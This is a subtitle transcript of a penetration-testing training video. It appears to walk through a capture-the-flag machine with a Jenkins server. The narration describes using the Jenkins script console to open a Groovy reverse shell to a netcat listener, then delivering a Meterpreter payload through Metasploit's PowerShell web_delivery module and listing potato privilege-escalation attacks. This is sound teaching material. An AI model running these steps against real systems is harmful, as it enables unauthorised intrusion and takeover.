1
00:00:00,390 --> 00:00:02,580
All right, let's take a look at our nmap results.

2
00:00:02,610 --> 00:00:05,810
So we've got port 80 open for HTTP.

3
00:00:06,300 --> 00:00:11,060
And we've got port 50000 open, also for HTTP.

4
00:00:11,550 --> 00:00:15,000
And then we've got our RPC and SMB open.

5
00:00:15,180 --> 00:00:19,080
So we have a few different paths we can take, and to save time,

6
00:00:19,080 --> 00:00:23,630
I'm going to take us down the correct path, but we could look at 445.

7
00:00:23,640 --> 00:00:27,360
We could do smbclient, see if we can connect anonymously.

8
00:00:27,360 --> 00:00:34,380
We can do more information gathering or more enumeration on 445, see what service is running

9
00:00:34,380 --> 00:00:39,780
or what version of Samba is running or SMB is running, and see if that has any exploits available for

10
00:00:39,780 --> 00:00:40,530
it.

11
00:00:40,650 --> 00:00:47,190
But here in this case we're just going to run off of port 80 and port 50000.

12
00:00:47,190 --> 00:00:48,540
So let's go navigate to those.

13
00:00:48,540 --> 00:00:50,940
I'm going to copy this real quick.

14
00:00:50,940 --> 00:00:55,540
Let's navigate to those and see. Let's do this.

15
00:01:00,010 --> 00:01:06,520
We'll navigate there, and then we'll also do an HTTP and we'll do 50000.

16
00:01:10,300 --> 00:01:10,750
OK.

17
00:01:10,850 --> 00:01:12,590
So we've got two things here.

18
00:01:12,650 --> 00:01:14,110
We've got Ask Jeeves.

19
00:01:14,360 --> 00:01:17,840
And when we have a web page like this, we'll probably click around.

20
00:01:17,840 --> 00:01:18,680
See what we've got.

21
00:01:18,750 --> 00:01:21,350
We can see that it's just giving us a pound sign.

22
00:01:21,470 --> 00:01:28,400
And here we could try to search something and it throws up this error, which would absolutely be

23
00:01:28,460 --> 00:01:32,580
a finding on a pen test.

24
00:01:32,600 --> 00:01:37,100
So we're seeing some sort of SQL error and it's trying to tell us maybe, hey, there's some sort of SQL

25
00:01:37,100 --> 00:01:43,640
injection here and it's giving us a SQL server and all this other stuff, except if we drag this, this

26
00:01:43,640 --> 00:01:45,450
is actually just an image.

27
00:01:45,500 --> 00:01:47,360
So it's just a trick page.

28
00:01:47,360 --> 00:01:50,060
There's nothing actually here.

29
00:01:50,150 --> 00:01:54,830
So our options here, and if we come to 50000 we can see there's a "powered by Jetty" which takes

30
00:01:54,830 --> 00:01:57,830
us to Jetty and there's nothing there either.

31
00:01:57,830 --> 00:02:05,990
So if we're sure that eighty thousand, or if we're sure that port 80 is our path, then we need to explore

32
00:02:06,050 --> 00:02:09,100
maybe directory busting here, and see where we can get.

33
00:02:09,110 --> 00:02:14,900
So what we're gonna do is we're just going to run dirbuster against 50000, and we would say

34
00:02:14,900 --> 00:02:21,070
dirbuster, like this, or you can run dirbuster but then you come in here and you would specify.

35
00:02:21,920 --> 00:02:27,980
So we would just say, hey, I want to run it against this, and I'm going to say go faster, I'm going to give

36
00:02:27,980 --> 00:02:28,930
it a wordlist.

37
00:02:28,940 --> 00:02:39,990
So I like to actually use the built-in wordlist under /usr/share and then wordlists, and then there is

38
00:02:39,990 --> 00:02:44,600
dirbuster in here. There's actually a dirbuster under /usr/share as well that you can use.

39
00:02:44,940 --> 00:02:48,870
And then the medium lowercase list is what I use.

40
00:02:48,870 --> 00:02:55,670
So I'm just gonna leave it with php and we're just gonna let it run. For the sake of this walkthrough

41
00:02:55,670 --> 00:02:58,750
and the sake of this video, we're just gonna kind of skip ahead a little bit.

42
00:02:58,760 --> 00:03:00,470
We'll look at the results later on.

43
00:03:00,470 --> 00:03:04,430
But what we're gonna find here is we're going to find an askjeeves

44
00:03:04,430 --> 00:03:07,020
page. There's gonna be something like this.

45
00:03:07,040 --> 00:03:14,250
askjeeves, and we're going to go ahead and find that directory, and this is where realism kind of comes

46
00:03:14,250 --> 00:03:15,030
into play.

47
00:03:15,120 --> 00:03:19,680
I find Jenkins servers all the time, and I find Jenkins servers.

48
00:03:19,680 --> 00:03:25,140
Now we have a login, so we could go try to log in with a password or credentials. I see Jenkins servers

49
00:03:25,140 --> 00:03:32,220
like this where you have builds out there and you have all sorts of information, like leaked credentials,

50
00:03:32,280 --> 00:03:34,890
all kinds of things, user names.

51
00:03:34,890 --> 00:03:40,510
I see API tokens, I see all kinds of stuff hiding in Jenkins servers on internal pen tests.

52
00:03:40,560 --> 00:03:46,860
So if you're watching this and you have a Jenkins server, secure your Jenkins server. But OK, if we go to Manage

53
00:03:46,860 --> 00:03:52,860
Jenkins, there's a nice little feature in here and that is the Script Console.

54
00:03:52,860 --> 00:03:58,530
Now Jenkins is very well known for having a script console, and here I'm going to go ahead and say cancel

55
00:03:58,530 --> 00:04:03,790
on this, and you can actually see, I'm gonna pause or stop this.

56
00:04:03,790 --> 00:04:04,360
You can see that.

57
00:04:04,360 --> 00:04:07,030
Ask Jeeves has been found in the directory.

58
00:04:07,030 --> 00:04:08,320
So we have askjeeves.

59
00:04:08,320 --> 00:04:11,630
It's already found that. I'm going to go ahead and stop this.

60
00:04:11,800 --> 00:04:19,290
So we have this script console, and the script console runs Groovy.

61
00:04:19,290 --> 00:04:21,110
Now Groovy is a language.

62
00:04:21,590 --> 00:04:31,850
OK, so what if we did something like Google and we said "groovy reverse shell", "pure groovy java reverse

63
00:04:31,870 --> 00:04:34,230
shell". I can't make this up.

64
00:04:34,240 --> 00:04:36,370
It is honestly this easy.

65
00:04:36,520 --> 00:04:43,250
Let's copy this and this will allow us to get a reverse shell with Jenkins.

66
00:04:43,250 --> 00:04:48,580
So please don't have your script console open because this is just nasty.

67
00:04:48,780 --> 00:04:54,330
So 10.10.14.3 is where I'm sitting, port 8044 is fine by me.

68
00:04:54,530 --> 00:05:03,190
So I'm going to open up a new window and I'm going to say netcat, nc -nlvp 8044, and

69
00:05:03,360 --> 00:05:07,680
I was gonna run this, and boom.

70
00:05:07,950 --> 00:05:09,030
It's that easy.

71
00:05:09,070 --> 00:05:10,650
It's really that easy.

72
00:05:10,750 --> 00:05:14,470
So watch out for your Jenkins servers again.

73
00:05:14,470 --> 00:05:19,360
And if you're a pen tester, look for those because they are a valuable, valuable resource.

74
00:05:19,360 --> 00:05:20,070
So here we are.

75
00:05:20,110 --> 00:05:25,870
We are on this machine, and I'm going to kind of do a little bit of enumeration now, and then we'll

76
00:05:25,870 --> 00:05:29,560
move on in the next video and we'll actually do the escalation.

77
00:05:29,650 --> 00:05:35,690
So if we're on this machine, the first thing I want to do is I want to say whoami, right.

78
00:05:35,710 --> 00:05:37,870
OK we are.

79
00:05:37,930 --> 00:05:38,800
whoami.

80
00:05:38,870 --> 00:05:41,740
And we are this jeeves\kohsuke.

81
00:05:41,800 --> 00:05:43,420
I don't know how to say it.

82
00:05:43,420 --> 00:05:44,080
We could do the quick

83
00:05:44,080 --> 00:05:44,620
whoami

84
00:05:44,620 --> 00:05:49,750
/priv, since we know that's kind of what we're looking at at this point, and you kind of already

85
00:05:49,750 --> 00:05:51,850
know because of the section where we're going.

86
00:05:51,880 --> 00:05:56,590
We're gonna go on this path, but we can see here that the impersonate privilege is enabled.

87
00:05:56,620 --> 00:06:02,960
So our wheels should start spinning: hey, impersonate privilege, maybe I've got something here.

88
00:06:02,970 --> 00:06:09,830
So what we're gonna do is, we can also pull down, just to show you, we could pull down systeminfo and

89
00:06:09,830 --> 00:06:15,570
save this out to a file and run our Windows privilege checker, right.

90
00:06:15,620 --> 00:06:16,640
So I can come here.

91
00:06:16,640 --> 00:06:17,840
Copy this.

92
00:06:18,140 --> 00:06:22,370
And then let's just go ahead and say, oh, it's actually here.

93
00:06:22,400 --> 00:06:23,320
Let me do this.

94
00:06:23,360 --> 00:06:30,320
We'll go to a new tab here and I'll just say gedit sysinfo.txt, even though I've got this in here,

95
00:06:30,410 --> 00:06:36,400
paste and save. And then, I don't ever remember the command because it involves a little bit of stuff.

96
00:06:36,410 --> 00:06:44,240
So I just type in history and then I say grep windows-exploit-suggester, and I just copy one of these,

97
00:06:45,700 --> 00:06:50,270
so we'll say windows-exploit-suggester, and then it's got your database that you used last time we

98
00:06:50,270 --> 00:06:57,580
were doing this in the enumeration section, paste it in here, and it's gonna run this and we're going

99
00:06:57,580 --> 00:07:03,950
to see what sort of things come up. So I'll make this a little bit bigger here.

100
00:07:04,260 --> 00:07:07,670
And if we scroll through this there's a lot of different things right.

101
00:07:07,760 --> 00:07:14,290
But Hot Potato comes up, Rotten Potato comes up, Tater comes up. These are all potato attacks.

102
00:07:14,460 --> 00:07:19,360
So if you're seeing this, this is one of the easiest ways to get escalation on a system.

103
00:07:19,440 --> 00:07:25,290
We have things for Internet Explorer, but those are really Microsoft Edge. Those aren't really what we're

104
00:07:25,290 --> 00:07:26,860
after here.

105
00:07:27,600 --> 00:07:30,030
If I see a potato attack I'm going to try that first.

106
00:07:30,360 --> 00:07:33,030
So it's something to be thinking about and looking for.

107
00:07:33,050 --> 00:07:35,840
But I mean you have all kinds of attacks here.

108
00:07:35,970 --> 00:07:40,440
So this is something that you should run pretty much right away and see what you can get.

109
00:07:40,440 --> 00:07:44,730
You could also drop winPEAS on this machine and run winPEAS, see what that pulls back. It's gonna

110
00:07:44,760 --> 00:07:46,420
pull back a lot of the same.

111
00:07:46,530 --> 00:07:51,350
So don't be afraid to look through some of these, see where you can get escalation.

112
00:07:51,420 --> 00:07:56,680
Now the other thing that we're gonna do, because we're doing a potato attack, is we're going to run Metasploit

113
00:07:56,820 --> 00:07:57,490
for this one.

114
00:07:57,510 --> 00:08:00,660
This is the most common and easiest way to do it.

115
00:08:00,870 --> 00:08:03,000
So that's how we're going to perform it.

116
00:08:03,000 --> 00:08:06,680
We're gonna go through and we're going to go ahead and just get a Meterpreter shell really quick.

117
00:08:06,690 --> 00:08:17,120
So I'm going to say msfconsole, and we're going to do a web delivery, so we're gonna go ahead and

118
00:08:17,120 --> 00:08:27,170
just say use multi, or use exploit/multi/script/web_delivery, and here's how we're gonna set this

119
00:08:27,170 --> 00:08:27,710
up. We're gonna say

120
00:08:27,710 --> 00:08:31,630
options, and we have targets down here.

121
00:08:31,650 --> 00:08:35,580
We go ahead and show targets. We're not going to use Python, whether or not Python was on the machine.

122
00:08:35,780 --> 00:08:39,770
We're just gonna go ahead and go for PowerShell, because this is gonna give us a PowerShell command to run

123
00:08:39,830 --> 00:08:41,250
and it's gonna run it for us.

124
00:08:41,390 --> 00:08:48,440
So we're just gonna go ahead and say set target 2, and then we're going to have to change the payload

125
00:08:48,440 --> 00:08:51,710
because the payload is also Python.

126
00:08:51,710 --> 00:09:02,160
Now I'm going to set this payload to windows/meterpreter/reverse_tcp, and why am I doing that?

127
00:09:02,180 --> 00:09:08,750
I'm doing that because I tried x64 on this when I went through this the first time and it did not work.

128
00:09:08,990 --> 00:09:10,300
So x64 does not work.

129
00:09:10,310 --> 00:09:13,790
We're actually going to have to just get a lower level shell and go from there.

130
00:09:14,120 --> 00:09:19,460
So we're going to an x86 shell, and if we need to migrate we will, but for now let's just go ahead and

131
00:09:19,520 --> 00:09:21,860
do this, and then we're going to set the LHOST.

132
00:09:22,280 --> 00:09:31,310
So my LHOST is 10.10.14.3 and my SRVHOST is gonna be 10.10.14.3

133
00:09:31,310 --> 00:09:31,870
as well.

134
00:09:35,380 --> 00:09:38,950
When we type options one more time we should have all the settings set.

135
00:09:39,140 --> 00:09:47,920
So our SRVHOST is set, our LHOST is set, our payload is set, and our exploit target is set to PowerShell.

136
00:09:47,940 --> 00:09:52,240
And I'm just gonna run this and say, hey, give us this PowerShell command to run.

137
00:09:52,430 --> 00:09:57,430
The job is already started in the background, so we won't have to worry about anything, and then all we gotta

138
00:09:57,440 --> 00:10:03,740
do is come in here and just paste this, hit enter, and hopefully the magic works over here.

139
00:10:03,740 --> 00:10:04,250
OK.

140
00:10:04,280 --> 00:10:07,160
Starting to fire, we should get a shell.

141
00:10:07,160 --> 00:10:07,980
There we go.

142
00:10:09,290 --> 00:10:15,340
So now with this, type in sessions 1 and open up our session, and here we can do a quick getuid,

143
00:10:15,340 --> 00:10:16,980
see we're the same user.

144
00:10:16,980 --> 00:10:22,460
We could do the sysinfo and see that we are x86 on x64 architecture, so we might need

145
00:10:22,460 --> 00:10:30,230
to migrate, and we can also do a getprivs, we could say, hey, what privs do we have.

146
00:10:30,230 --> 00:10:34,370
So this is the Meterpreter way of doing it. Again we see this impersonate privilege.

147
00:10:34,410 --> 00:10:35,790
This is what we're after.

148
00:10:35,880 --> 00:10:47,360
Now we could run the post that allows us, post/multi/recon/local_exploit_suggester, just like

149
00:10:47,360 --> 00:10:47,830
that.

150
00:10:48,320 --> 00:10:53,410
And this is gonna do that same type of checking. It's going to see what's available to us.

151
00:10:53,420 --> 00:10:57,470
And you're going to see that there are a couple of built in potato attacks as well.

152
00:10:57,470 --> 00:10:59,680
So let's go ahead and let this run really quick.

153
00:10:59,810 --> 00:11:06,230
Actually what we'll do is let this run, we'll stop the video here, and we'll go ahead and move on in the

154
00:11:06,230 --> 00:11:09,590
next video and we'll actually start the escalation process.

155
00:11:09,590 --> 00:11:11,220
So take a look at what's here.

156
00:11:11,360 --> 00:11:12,610
You can see Juicy.

157
00:11:12,620 --> 00:11:16,040
This is a potato attack. Reflection, also a potato attack.

158
00:11:16,040 --> 00:11:19,520
So two potato attacks right here.

159
00:11:19,520 --> 00:11:20,870
Go ahead, pause now.

160
00:11:20,930 --> 00:11:23,700
Meet me in the next video and we actually start working on the escalation.

161
00:11:23,720 --> 00:11:25,150
So I'll catch you over in the next video.
